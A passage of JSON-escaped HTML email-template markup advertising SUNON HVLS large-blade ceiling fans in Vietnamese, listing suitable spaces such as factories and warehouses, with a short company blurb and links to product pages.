style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-color v-line-height v-font-size\\\" style=\\\"font-family: \'Lato\',sans-serif; font-size: 14px; color: #0e64a3; line-height: 100%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"line-height: 100%; text-align: center;\\\"><span style=\\\"font-size: 14px; line-height: 14px; font-family: inherit;\\\">Nh\\u00e0 x\\u01b0\\u1edfng, khu s\\u1ea3n xu\\u1ea5t<br \\/><\\/span><\\/p>\\r\\n<p style=\\\"line-height: 100%; text-align: center;\\\"><span style=\\\"font-size: 14px; line-height: 14px; font-family: inherit;\\\">Ch\\u1ebf bi\\u1ebfn, gia c\\u00f4ng c\\u00f4ng nghi\\u1ec7p<\\/span><\\/p>\\r\\n<p style=\\\"line-height: 100%; text-align: center;\\\"><span style=\\\"font-size: 14px; line-height: 14px; font-family: inherit;\\\">Trang tr\\u1ea1i, s\\u1ea3n xu\\u1ea5t n\\u00f4ng nghi\\u1ec7p<\\/span><\\/p>\\r\\n<p style=\\\"line-height: 100%; text-align: center;\\\"><span style=\\\"font-family: inherit; line-height: 14px; font-size: 14px;\\\">Kho ch\\u1ee9a h\\u00e0ng...<\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:15px 10px 25px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div align=\\\"center\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"https:\\/\\/www.quatcaocap.com\\/quat-tran-canh-lon-powerful-s10\\\" style=\\\"height:37px; v-text-anchor:middle; width:293px;\\\" arcsize=\\\"2.5%\\\"  strokecolor=\\\"#CCC\\\" strokeweight=\\\"1px\\\" fillcolor=\\\"#ffffff\\\"><w:anchorlock\\/><center style=\\\"color:#079442;font-family: inherit; \\\"><![endif]-->\\r\\n    <a href=\\\"https:\\/\\/www.quatcaocap.com\\/quat-tran-canh-lon-powerful-s10\\\" target=\\\"_blank\\\" class=\\\"v-button v-font-size\\\" style=\\\"box-sizing: border-box;display: inline-block;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #079442; background-color: #ffffff; border-radius: 1px;-webkit-border-radius: 1px; -moz-border-radius: 1px; width:100%; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;border-top-color: #CCC; border-top-style: solid; border-top-width: 1px; border-left-color: #CCC; border-left-style: solid; border-left-width: 1px; border-right-color: #CCC; border-right-style: solid; border-right-width: 1px; border-bottom-color: #CCC; border-bottom-style: solid; border-bottom-width: 1px;font-family: inherit; font-size: 14px;\\\">\\r\\n      <span class=\\\"v-line-height\\\" style=\\\"display:block;padding:10px 20px;line-height:120%;\\\"><strong><span style=\\\"line-height: 16.8px;\\\">XEM TH\\u00caM - SUNON PS10<br \\/><\\/span><\\/strong><\\/span>\\r\\n    <\\/a>\\r\\n    <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n  <\\/div>\\r\\n  \\r\\n\\r\\n\\r\\n  \\r\\n  \\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"margin: 0 auto;min-width: 320px;max-width: 630px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:630px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"630\\\" style=\\\"width: 630px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 630px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <h1 class=\\\"v-color v-line-height v-font-size\\\" style=\\\"margin: 0px; line-height: 140%; text-align: center; word-wrap: break-word; font-family: inherit; font-size: 22px; font-weight: 700;\\\">\\u1ee8ng d\\u1ee5ng l\\u1eafp \\u0111\\u1eb7t c\\u00e1c kh\\u00f4ng gian c\\u1ea7n l\\u00e0m m\\u00e1t:<\\/h1>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n  <\\/div>\\r\\n  \\r\\n\\r\\n\\r\\n  \\r\\n  \\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: #000000\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"margin: 0 auto;min-width: 320px;max-width: 630px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: #000000;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:630px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"315\\\" style=\\\"width: 315px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 315px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-color v-line-height v-font-size\\\" style=\\\"font-family: inherit; font-size: 14px; color: #ffffff; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <ul style=\\\"list-style-type: square;\\\">\\r\\n<li style=\\\"line-height: 19.6px;\\\">Nh\\u00e0 kho h\\u00e0ng b\\u00e1n l\\u1ebb di\\u1ec7n t\\u00edch nh\\u1ecf<\\/li>\\r\\n<li style=\\\"line-height: 19.6px;\\\">Trung t\\u00e2m Th\\u01b0\\u01a1ng m\\u1ea1i, showroom xe h\\u01a1i<\\/li>\\r\\n<li style=\\\"line-height: 19.6px;\\\">Nh\\u00e0 \\u1edf bi\\u1ec7t th\\u1ef1, nh\\u00e0 v\\u01b0\\u1eddn, chung c\\u01b0 duplex<\\/li>\\r\\n<li style=\\\"line-height: 19.6px;\\\">Ph\\u00f2ng kh\\u00e1ch, n\\u01a1i l\\u00e0m vi\\u1ec7c kh\\u00f4ng gian m\\u1edf<\\/li>\\r\\n<li style=\\\"line-height: 19.6px;\\\">Nh\\u00e0 h\\u00e0ng qu\\u00e1n ngo\\u00e0i tr\\u1eddi<\\/li>\\r\\n<li style=\\\"line-height: 19.6px;\\\">V\\u0103n ph\\u00f2ng l\\u00e0m vi\\u1ec7c l\\u1edbn<\\/li>\\r\\n<li style=\\\"line-height: 19.6px;\\\">S\\u1ea3nh ti\\u1ebfp \\u0111\\u00f3n - ph\\u00f2ng h\\u1ed9i ngh\\u1ecb<\\/li>\\r\\n<\\/ul>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"315\\\" style=\\\"width: 315px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 315px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-color v-line-height v-font-size\\\" style=\\\"font-family: inherit; font-size: 14px; color: #ffffff; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <ul style=\\\"list-style-type: square;\\\">\\r\\n<li style=\\\"line-height: 19.6px;\\\">Nh\\u00e0 x\\u01b0\\u1edfng, kho h\\u00e0ng r\\u1ed9ng l\\u1edbn<\\/li>\\r\\n<li style=\\\"line-height: 19.6px;\\\">Nh\\u00e0 th\\u1edd, kh\\u00f4ng gian l\\u1edbn<\\/li>\\r\\n<li style=\\\"line-height: 19.6px;\\\">Trung t\\u00e2m Th\\u01b0\\u01a1ng m\\u1ea1i, Garage OTO<\\/li>\\r\\n<li style=\\\"line-height: 19.6px;\\\">Kho ch\\u1ee9a h\\u00e0ng, ph\\u00e2n ph\\u1ed1i<\\/li>\\r\\n<li style=\\\"line-height: 19.6px;\\\">S\\u00e2n b\\u00f3ng,si\\u00eau th\\u1ecb, nh\\u00e0 h\\u00e1t<\\/li>\\r\\n<li style=\\\"line-height: 19.6px;\\\">Ph\\u00f2ng \\u0111\\u1ee3i s\\u00e2n bay, kh\\u00f4ng gian m\\u1edf<\\/li>\\r\\n<li style=\\\"line-height: 19.6px;\\\">S\\u1ea3nh trung t\\u00e2m si\\u00eau th\\u1ecb b\\u00e1n l\\u1ebb<\\/li>\\r\\n<li style=\\\"line-height: 19.6px;\\\">Kh\\u00f4ng gian vui ch\\u01a1i gi\\u1ea3i tr\\u00ed<\\/li>\\r\\n<\\/ul>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n  <\\/div>\\r\\n  \\r\\n\\r\\n\\r\\n  \\r\\n  \\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"margin: 0 auto;min-width: 320px;max-width: 630px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #ffffff;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:630px;\\\"><tr style=\\\"background-color: #ffffff;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"630\\\" style=\\\"width: 630px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 630px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 1px solid #ced4d9;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:25px 10px 10px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-color v-line-height v-font-size\\\" style=\\\"font-size: 14px; color: #a47e6b; line-height: 140%; text-align: right; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><strong><span style=\\\"font-size: 32px; line-height: 44.8px; font-family: \'Playfair Display\', serif;\\\">\\\"<\\/span><span style=\\\"font-family: \'Playfair Display\', serif; font-size: 32px; line-height: 44.8px;\\\">S\\u1ea3n xu\\u1ea5t ch\\u1ea5t l\\u01b0\\u1ee3ng ti\\u00eau chu\\u1ea9n TAIWAN\\\"<\\/span><\\/strong><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:20px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-color v-line-height v-font-size\\\" style=\\\"font-size: 14px; color: #292828; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"line-height: 140%;\\\"><span style=\\\"font-family: inherit; line-height: 22.4px; font-size: 16px;\\\">SUNON v\\u1edbi 40 n\\u0103m kinh nghi\\u1ec7m trong ng\\u00e0nh thi\\u1ebft k\\u1ebf &amp; s\\u1ea3n xu\\u1ea5t c\\u00f4ng ngh\\u1ec7 \\u0111\\u1ed9ng c\\u01a1 BLDC t\\u1ea1i Taiwan. V\\u00e0o n\\u0103m 2017, SUNON \\u0111\\u00e3 ra m\\u1eaft qu\\u1ea1t HVLS s\\u1eed d\\u1ee5ng \\u0111\\u1ed9ng c\\u01a1 ti\\u1ebft ki\\u1ec7m n\\u0103ng l\\u01b0\\u1ee3ng DC (BLDC) kh\\u00f4ng ch\\u1ed5i than. B\\u1eb1ng t\\u00ednh to\\u00e1n kh\\u00ed \\u0111\\u1ed9ng l\\u1ef1c h\\u1ecdc \\u0111\\u01b0\\u1ee3c s\\u1eed d\\u1ee5ng \\u0111\\u1ec3 t\\u1ed1i \\u01b0u h\\u00f3a lu\\u1ed3ng gi\\u00f3, cho ph\\u00e9p qu\\u1ea1t SUNON HVLS t\\u1ea1o ra lu\\u1ed3ng gi\\u00f3 l\\u1edbn v\\u1edbi t\\u1ed1c \\u0111\\u1ed9 quay th\\u1ea5p, \\u0111\\u1ea1t \\u0111\\u01b0\\u1ee3c hi\\u1ec7u su\\u1ea5t t\\u1ed1i \\u01b0u m\\u00e0 qu\\u1ea1t HVLS kh\\u00e1c kh\\u00f4ng th\\u1ec3 \\u0111\\u1ea1t \\u0111\\u01b0\\u1ee3c.<\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677163676213-cam-nhan-nhiet-do.jpg\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 600px;\\\" width=\\\"600\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n  <\\/div>\\r\\n  \\r\\n\\r\\n\\r\\n  \\r\\n  \\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"margin: 0 auto;min-width: 320px;max-width: 630px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #ffffff;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:630px;\\\"><tr style=\\\"background-color: #ffffff;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"630\\\" style=\\\"width: 630px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 630px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:25px 10px 10px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-color v-line-height v-font-size\\\" style=\\\"font-family: \'Cabin\',sans-serif; font-size: 14px; font-weight: 700; color: #048a3c; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-family: inherit; font-size: 14px; line-height: 19.6px;\\\"><strong><span style=\\\"font-size: 34px; line-height: 47.6px;\\\">Qu\\u1ea1t tr\\u1ea7n c\\u00e1nh l\\u1edbn HVLS SUNON<br \\/><\\/span><\\/strong><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 0px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-color v-line-height v-font-size\\\" style=\\\"font-family: \'Crimson Text\',serif; font-size: 14px; color: #34495e; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-family: inherit; line-height: 19.6px;\\\"><strong><span style=\\\"font-size: 22px; line-height: 30.8px;\\\">Kh\\u00e1c v\\u1edbi h\\u1ea7u h\\u1ebft c\\u00e1c lo\\u1ea1i qu\\u1ea1t tr\\u1ea7n c\\u00f4ng nghi\\u1ec7p l\\u1edbn tr\\u00ean th\\u1ecb tr\\u01b0\\u1eddng s\\u1ea3n xu\\u1ea5t t\\u1ea1i China d\\u1ef1a v\\u00e0o t\\u1ed1c \\u0111\\u1ed9 quay nhanh \\u0111\\u1ec3 t\\u1ea1o ra c\\u00e1c lu\\u1ed3ng gi\\u00f3 kh\\u00f4ng \\u1ed5n \\u0111\\u1ecbnh v\\u00e0 kh\\u00f4ng \\u0111\\u1ed3ng \\u0111\\u1ec1u.\\u00a0<\\/span><\\/strong><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:5px 10px 10px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"48%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 2px solid #34495e;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:15px 10px 25px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div align=\\\"center\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" 